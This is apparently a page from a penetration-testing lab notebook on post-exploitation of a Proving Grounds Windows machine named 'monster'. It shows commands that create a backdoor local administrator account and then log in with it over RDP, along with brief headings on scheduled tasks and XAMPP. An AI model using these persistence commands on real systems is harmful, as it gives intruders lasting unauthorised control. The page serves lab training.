InfoSec LAB

Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as the administrator user after compromising the target system.

PS C:\WINDOWS\system32> net user /ADD adm1n qwe123 ; net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ xfreerdp /u:adm1n /p:'qwe123' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0

RDP

Scheduled Tasks

Simulation Custom binary

XAMPP

All XAMPP related processes are running with privileges of the mike user.

It’s questionable how exploiting CVE-2020-11107 leads to the administrator user

InfoSec LAB

Explorer

Monster_Beyond

Beyond

Scheduled Tasks

XAMPP

Interactive Graph View

Table of Contents

Backlinks